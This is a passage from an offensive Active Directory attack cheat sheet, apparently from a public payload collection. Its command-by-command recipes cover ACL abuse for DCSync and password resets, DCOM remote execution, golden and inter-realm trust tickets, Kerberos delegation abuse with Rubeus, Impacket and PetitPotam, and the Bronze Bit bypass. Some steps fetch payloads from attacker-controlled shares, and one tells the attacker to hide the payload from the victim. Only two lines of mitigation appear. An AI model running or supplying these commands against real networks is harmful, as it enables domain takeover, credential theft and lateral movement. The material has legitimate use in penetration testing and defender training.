'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" - - # Using bloodyAD with pass-the-hash - bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd - ``` - -* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` - -#### GenericWrite and Remote Connection Manager - -> Now let’s say you are in an Active Directory environment that still actively uses a Windows Server version that has RCM enabled, or that you are able to enable RCM on a compromised RDSH, what can we actually do ? Well each user object in Active Directory has a tab called ‘Environment’. -> -> This tab includes settings that, among other things, can be used to change what program is started when a user connects over the Remote Desktop Protocol (RDP) to a TS/RDSH in place of the normal graphical environment. The settings in the ‘Starting program’ field basically function like a windows shortcut, allowing you to supply either a local or remote (UNC) path to an executable which is to be started upon connecting to the remote host. During the logon process these values will be queried by the RCM process and run whatever executable is defined. - https://sensepost.com/blog/2020/ace-to-rce/ - -:warning: The RCM is only active on Terminal Servers/Remote Desktop Session Hosts. The RCM has also been disabled on recent version of Windows (>2016), it requires a registry change to re-enable. - -```powershell -$UserObject = ([ADSI]("LDAP://CN=User,OU=Users,DC=ad,DC=domain,DC=tld")) -$UserObject.TerminalServicesInitialProgram = "\\1.2.3.4\share\file.exe" -$UserObject.TerminalServicesWorkDirectory = "C:\" -$UserObject.SetInfo() -``` - -NOTE: To not alert the user the payload should hide its own process window and spawn the normal graphical environment. - -### WriteDACL - -To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'` - -* WriteDACL on Domain: - * On Windows: - ```powershell - # Give DCSync right to the principal identity - Import-Module .\PowerView.ps1 - $SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force - $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword) - Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local - ``` - * On Linux: - ```bash - # Give DCSync right to the principal identity - bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 - - # Remove right after DCSync - bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False - ``` - -* WriteDACL on Group - ```powershell - Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 - net group "INTERESTING_GROUP" User1 /add /domain - ``` - Or - ```powershell - bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp - - # Remove right - bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False - ``` - -### WriteOwner - -An attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. This can be achieved with Set-DomainObjectOwner (PowerView module). - -```powershell -Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal' -``` -Or -```powershell -bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object -``` - -This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group. - - -### ReadLAPSPassword - -An attacker can read the LAPS password of the computer account this ACE applies to. This can be achieved with the Active Directory PowerShell module. Detail of the exploitation can be found in the [Reading LAPS Password](#reading-laps-password) section. - -```powershell -Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' -``` -Or for a given computer -```powershell -bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime -``` - - -### ReadGMSAPassword - -An attacker can read the GMSA password of the account this ACE applies to. This can be achieved with the Active Directory and DSInternals PowerShell modules. - -```powershell -# Save the blob to a variable -$gmsa = Get-ADServiceAccount -Identity 'SQL_HQ_Primary' -Properties 'msDS-ManagedPassword' -$mp = $gmsa.'msDS-ManagedPassword' - -# Decode the data structure using the DSInternals module -ConvertFrom-ADManagedPasswordBlob $mp -``` -Or -```powershell -python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword -``` - -### ForceChangePassword - -An attacker can change the password of the user this ACE applies to: -* On Windows, this can be achieved with `Set-DomainUserPassword` (PowerView module): -```powershell -$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force -Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword -``` - -* On Linux: -```bash -# Using rpcclient from the Samba software suite -rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" - -# Using bloodyAD with pass-the-hash -bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd -``` - - -## DCOM Exploitation - -> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer. - - -* Impacket DCOMExec.py - ```ps1 - dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...] - dcomexec.py -share C$ -object MMC20 '/:@' - dcomexec.py -share C$ -object MMC20 '/:@' 'ipconfig' - - python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe' - # -object MMC20 specifies that we wish to instantiate the MMC20.Application object. - # -silentcommand executes the command without attempting to retrieve the output. - ``` -* CheeseTools - https://github.com/klezVirus/CheeseTools - ```powershell - # https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/ - -t, --target=VALUE Target Machine - -b, --binary=VALUE Binary: powershell.exe - -a, --args=VALUE Arguments: -enc - -m, --method=VALUE Methods: MMC20Application, ShellWindows, - ShellBrowserWindow, ExcelDDE, VisioAddonEx, - OutlookShellEx, ExcelXLL, VisioExecLine, - OfficeMacro - -r, --reg, --registry Enable registry manipulation - -h, -?, --help Show Help - - Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro. - ``` -* Invoke-DCOM - https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1 - ```powershell - Import-Module .\Invoke-DCOM.ps1 - Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe" - Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe" - Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService" - Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe" - Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe" - ``` - - -### DCOM via MMC Application Class - -This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named **"ExecuteShellCommand"** under **Document.ActiveView**. - -```ps1 -PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")) -PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7) -PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7") - -# Weaponized example with MSBuild -PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7") -``` - -Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1 - -### DCOM via Office - -* Excel.Application - * DDEInitiate - * RegisterXLL -* Outlook.Application - * CreateObject->Shell.Application->ShellExecute - * CreateObject->ScriptControl (office-32bit only) -* Visio.InvisibleApp (same as Visio.Application, but should not show the Visio window) - * Addons - * ExecuteLine -* Word.Application - * RunAutoMacro - - -```ps1 -# Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM -Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9 -Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a - -# Using Excel DDE -PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) -PS C:\> $excel.DisplayAlerts = $false -PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe") - -# Using Excel RegisterXLL -# Can't be used reliably with a remote target -Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1 -PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) -PS> $excel.RegisterXLL("EvilXLL.dll") - -# Using Visio -$visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName")) -$visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc") - -``` - -### DCOM via ShellExecute - -```ps1 -$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1") -$obj = [System.Activator]::CreateInstance($com) -$item = $obj.Item() -$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) -``` - -### DCOM via ShellBrowserWindow - -:warning: Windows 10 only, the object doesn't exists in Windows 7 - -```ps1 -$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1") -$obj = [System.Activator]::CreateInstance($com) -$obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) -``` - -## Trust relationship between domains - -* One-way - * Domain B trusts A - * Users in Domain A can access resources in Domain B - * Users in Domain B cannot access resources in Domain A -* Two-way - * Domain A trusts Domain B - * Domain B trusts Domain A - * Authentication requests can be passed between the two domains in both directions - -### Enumerate trusts between domains - -```powershell -nltest /trusted_domains -``` - -or - -```powershell -([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() - -SourceName TargetName TrustType TrustDirection ----------- ---------- --------- -------------- -domainA.local domainB.local TreeRoot Bidirectional -``` - -### Exploit trusts between domains - -:warning: Require a Domain-Admin level access to the current domain. - -| Source | Target | Technique to use | Trust relationship | -|---|---|---|---| -| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | -| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | -| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | -| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | - - - -## Child Domain to Forest Compromise - SID Hijacking - -Most trees are linked with dual sided trust relationships to allow for sharing of resources. -By default the first domain created if the Forest Root. - -**Requirements**: -- KRBTGT Hash -- Find the SID of the domain - ```powershell - $ Convert-NameToSid target.domain.com\krbtgt - S-1-5-21-2941561648-383941485-1389968811-502 - - # with Impacket - lookupsid.py domain/user:password@10.10.10.10 - ``` -- Replace 502 with 519 to represent Enterprise Admins -- Create golden ticket and attack parent domain. - ```powershell - kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt - ``` - -## Forest to Forest Compromise - Trust Ticket - -* Require: SID filtering disabled - -From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using -Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**. - -### Dumping trust passwords (trust keys) - -> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts. - -```powershell -lsadump::trust /patch - -or find the TRUST_NAME$ machine account hash -``` - -### Create a forged trust ticket (inter-realm TGT) using Mimikatz - -```powershell -mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi -mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi -``` - -### Use the Trust Ticket file to get a ST for the targeted service - -```powershell -.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local -.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt -``` - -Inject the ST file and access the targeted service with the spoofed rights. - -```powershell -kirbikator lsa .\ticket.kirbi -ls \\machine.domain.local\c$ -``` - -## Privileged Access Management (PAM) Trust - -> PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. Temporary Group Membership also introduced so perms only given for set time. -Enumeration - -Requirements: -* Windows Server 2016 or earlier - -If we compromise the bastion we get `Domain Admins` privileges on the other domain - -* Default configuration for PAM Trust - ```ps1 - # execute on our forest - netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes - netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes - netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes - netdom trust lab.local /domain:bastion.local /Quarantine:No - # execute on our bastion - netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes - ``` -* Enumerate PAM trusts - ```ps1 - # Detect if current forest is PAM trust - Import ADModule - Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} - - # Enumerate shadow security principals - Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl - - # Enumerate if current forest is managed by a bastion forest - # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External - Get-ADTrust -Filter {(ForestTransitive -eq $True)} - ``` -* Compromise - * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...) - * Using SID History -* Persistence - ```ps1 - # Add a compromised user to the group - Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"} - ``` - - -## Kerberos Unconstrained Delegation - -> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html - -> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory. - -:warning: Unconstrained delegation used to be the only option available in Windows 2000 - -> **Warning** -> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket - -### SpoolService Abuse with Unconstrained Delegation - -The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. - -**Requirements**: -- Object with Property **Trust this computer for delegation to any service (Kerberos only)** -- Must have **ADS_UF_TRUSTED_FOR_DELEGATION** -- Must not have **ADS_UF_NOT_DELEGATED** flag -- User must not be in the **Protected Users** group -- User must not have the flag **Account is sensitive and cannot be delegated** - -#### Find delegation - -:warning: : Domain controllers usually have unconstrained delegation enabled. -Check the `TRUSTED_FOR_DELEGATION` property. - -* [ADModule](https://github.com/samratashok/ADModule) - ```powershell - # From https://github.com/samratashok/ADModule - PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True} - ``` - -* [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) - ```powershell - $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10 - grep TRUSTED_FOR_DELEGATION domain_computers.grep - ``` - -* [CrackMapExec module](https://github.com/byt3bl33d3r/CrackMapExec/wiki) - ```powershell - cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation - ``` - -* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` -* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl` - -#### SpoolService status - -Check if the spool service is running on the remote host - -```powershell -ls \\dc01\pipe\spoolss -python rpcdump.py DOMAIN/user:password@10.10.10.10 -``` - -#### Monitor with Rubeus - -Monitor incoming connections from Rubeus. - -```powershell -Rubeus.exe monitor /interval:1 -``` - -#### Force a connect back from the DC - -Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object. - -> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface. - -```powershell -# From https://github.com/leechristensen/SpoolSample -.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME -.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB -# DC01.HACKER.LAB is the domain controller we want to compromise -# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control. - -# From https://github.com/dirkjanm/krbrelayx -printerbug.py 'domain/username:password'@ - -# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689 -python dementor.py -d domain -u username -p password -``` - -If the attack worked you should get a TGT of the domain controller. - -#### Load the ticket - -Extract the base64 TGT from Rubeus output and load it to our current session. - -```powershell -.\Rubeus.exe asktgs /ticket: /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt -``` - -Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` - -Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt` - - -#### Mitigation - -* Ensure sensitive accounts cannot be delegated -* Disable the Print Spooler Service - - -### MS-EFSRPC Abuse with Unconstrained Delegation - -Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`. - -```bash -# Coerce the callback -git clone https://github.com/topotam/PetitPotam -python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP -python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP - -# Extract the ticket -.\Rubeus.exe asktgs /ticket: /ptt -``` - - -## Kerberos Constrained Delegation - -> Kerberos Constrained Delegation (KCD) is a security feature in Microsoft's Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service. - - -### Identify a Constrained Delegation - -* BloodHound: `MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p` -* PowerView: `Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft` -* Native - ```powershell - Get-DomainComputer -TrustedToAuth | select -exp dnshostname - Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo - ``` - -### Exploit the Constrained Delegation - -* Impacket - ```ps1 - getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10 - ``` - -* Rubeus: S4U2 attack (S4U2self + S4U2proxy) - ```ps1 - # with a password - Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password" - - # with a NT hash - Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt - Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt - dir \\dc.domain.com\c$ - ``` - -* Rubeus: use an existing ticket to perform a S4U2 attack to impersonate the "Administrator" - ```ps1 - # Dump ticket - Rubeus.exe tgtdeleg /nowrap - Rubeus.exe triage - Rubeus.exe dump /luid:0x12d1f7 - - # Create a ticket - Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /ticket:doIFRjCCBUKgAwIBB...BTA== /ptt - ``` - -* Rubeus : using aes256 keys - ```ps1 - # Get aes256 keys of the machine account - privilege::debug - token::elevate - sekurlsa::ekeys - - # Create a ticket - Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /user:win10x64$ /aes256:4b55f...fd82 /ptt - ``` - - -### Impersonate a domain user on a resource - -Require: -* SYSTEM level privileges on a machine configured with constrained delegation - -```ps1 -PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null -PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator') -PS> $idToImpersonate.Impersonate() -PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name -PS> ls \\dc01.offense.local\c$ -``` - - -## Kerberos Resource Based Constrained Delegation - -Resource-based Constrained Delegation was introduced in Windows Server 2012. - -> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html - -1. Import **Powermad** and **Powerview** - - ```powershell - PowerShell.exe -ExecutionPolicy Bypass - Import-Module .\powermad.ps1 - Import-Module .\powerview.ps1 - ``` - -2. Get user SID - - ```powershell - $AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid - $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID} - $ACE - ConvertFrom-SID $ACE.SecurityIdentifier - ``` - -3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it - - ```powershell - New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force) - ``` - -4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties - - ```powershell - $ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid - $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" - $SDBytes = New-Object byte[] ($SD.BinaryLength) - $SD.GetBinaryForm($SDBytes, 0) - Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} - $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity - $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 - $Descriptor.DiscretionaryAcl - ``` - - ```ps1 - # alternative - $SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid - $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} - - # alternative - StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND - ``` - -5. Use Rubeus to get hash from password - - ```powershell - Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan - [*] Input password : Weakest123* - [*] Input username : swktest$ - [*] Input domain : factory.lan - [*] Salt : FACTORY.LANswktest - [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD - [*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498 - [*] aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 - [*] des_cbc_md5 : BA297CFD07E62A5E - ``` - -6. Impersonate domain admin using our newly created machine account - - ```powershell - .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap - .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap - - [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' - [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) - [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan' - [*] Sending S4U2proxy request - [+] S4U2proxy success! - [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan': - - doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD - AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE - LmZhY3RvcnkubGFu - - [*] Action: Import Ticket - [+] Ticket successfully imported! - ``` - -## Kerberos Service for User Extension - -* Service For User To Self which allows a service to obtain a TGS on behalf of another user -* Service For User To Proxy which allows a service to obtain a TGS on behalf of another user on another service - -### S4U2self - Privilege Escalation - -1. Get a TGT - * Using Unconstrained Delegation - * Using the current machine account: `Rubeus.exe tgtdeleg /nowrap` -2. Use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine. - ```ps1 - Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001.domain.local" /ticket:"base64ticket" - Rubeus.exe ptt /ticket:"base64ticket" - - Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001" /ticket:"base64ticket" /ptt - ``` - -The "Network Service" account and the AppPool identities can act as the computer account in terms of Active Directory, they are only restrained locally. Therefore it is possible to invoke S4U2self if you run as one of these and request a service ticket for any user (e.g. someone with local admin rights, like DA) to yourself. - -```ps1 -# The Rubeus execution will fail when trying the S4UProxy step, but the ticket generated by S4USelf will be printed. -Rubeus.exe s4u /user:${computerAccount} /msdsspn:cifs/${computerDNS} /impersonateuser:${localAdmin} /ticket:${TGT} /nowrap -# The service name is not included in the TGS ciphered data and can be modified at will. -Rubeus.exe tgssub /ticket:${ticket} /altservice:cifs/${ServerDNSName} /ptt -``` - - -## Kerberos Bronze Bit Attack - CVE-2020-17049 - -> An attacker can impersonate users which are not allowed to be delegated. This includes members of the **Protected Users** group and any other users explicitly configured as **sensitive and cannot be delegated**. - -> Patch is out on November 10, 2020, DC are most likely vulnerable until [February 2021](https://support.microsoft.com/en-us/help/4598347/managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049). - -:warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)` - -Requirements: -* Service account's password hash -* Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation` -* [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013) - -**Attack #1** - Bypass the `Trust this user for delegation to specified services only – Use Kerberos only` protection and impersonate a user who is protected from delegation. - -```powershell -# forwardable flag is only protected by the ticket encryption which uses the service account's password -$ getST.py -spn cifs/Service2.test.local -impersonate Administrator -hashes -aesKey test.local/Service1 -force-forwardable -dc-ip # -> Forwardable - -$ getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable - -# Load the ticket -.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit - -# Access "c$" -ls \\service2.test.local\c$ -``` - -**Attack #2** - Write Permissions to one or more objects in the AD - -```powershell -# Create a new machine account -Import-Module .\Powermad\powermad.ps1 -New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force) -.\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService 